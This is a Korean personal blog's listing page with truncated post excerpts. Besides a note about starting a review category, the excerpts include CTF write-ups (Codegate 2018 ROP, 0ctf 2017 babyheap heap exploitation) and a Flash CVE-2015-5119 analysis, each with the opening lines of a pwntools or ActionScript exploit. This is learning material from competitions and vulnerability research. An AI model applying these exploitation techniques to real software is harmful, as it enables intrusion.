'Review' 카테고리를 개설 했습니다. 'Review' 기존에 페이스북이나 인스타그램등에 똥을 싸지르는것 보다는... 아무도 보지 않는 (투데이 6!) 블로그에 쓰는게 낫다고 생각 해서 이런 결정을 하게 되었습니다. 주로 의류(브랜드), 음악(주로 랩), 음식(???) 등을 리뷰 할 생각입니다. 글을 쓰거나 꾸미거나 하는데에 소질이 없기에 이런거로 취미 생활겸 실력도 늘이기로 했습니다. ps) 티스토리 기능중 '페이지'는 뭘 하는걸까요? Codegate 2018 Write up : melong, BaskinRobins31, RedVelvet, ImpelDown BaskinRobins31 Category : pwn 그냥 simple ROP 문제이다. 굳이 게임을 이길 필요는 없고 사용자 턴일때 ROP를 할 수 있다. 단 libc 파일이 주어지지 않아 *운*이 좋게인진 모르겠는데 최신 버전은 다 그런지도 모르겠지만은 본인 버전 libc로는 오프셋 계산 공격이 되지 않길래 libc의 read함수 text영역에서 \x0f\x05(syscall)이 나올때까지 긁은 후 시스템 콜 인자를 구성 해 공격 했다.#!/usr/bin/python from pwn import * e = ELF("./BaskinRobins31") context.clear(arch='amd64') #p = process("./BaskinRobins31"); p = remote("ch41l3ng3s.c.. 0ctf 2017 babyheap 요즘 다시 대회 문제에 손을 하나씩 대고 있는데...힙이 아직 넘사벽이여서힙을 공부중입니다껄껄 그냥 fastbin duplicate + unsorted bin에 관해 알면 익스가 가능 합니다. 대충 봤는데 heap base를 릭 해서 뚜샤뚜샤 하루도 있을거 같고mprotect를 heap 세그먼트에 써서 쉘코드 뚜샤뚜샤도 될거 같다 히히 친-절하게 주석까지 다 달아 놓음 #!/usr/bin/pythonfrom pwn import * p = process("./babyheap")#p = remote("localhost",4000)lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")elf = ELF("./babyheap") def alloca(size):p.sendline("1")p.. YISF 2017 PREQUAL WRITE UP BugHunting Diary #2 보호되어 있는 글입니다. BugHunting Diary #1 보호되어 있는 글입니다. Re:Zero 부터 시작하는 Flash Player CVE 분석 CVE-2015-5119 분석 4일차 CVE-2015-5119 PoC 코드 package { import flash.display.Sprite; import flash.events.Event; import flash.utils.ByteArray; import flash.media.Sound; import flash.external.ExternalInterface; public class Main extends Sprite { private var data:uint = 0xdeaddead; private var ba:ByteArray = new ByteArray(); private var o:*; private var uv:Vector.; private var bp:Sound = new Sound(); public function Main().. 이전 1 2 3 4 5 6 7 ··· 9 다음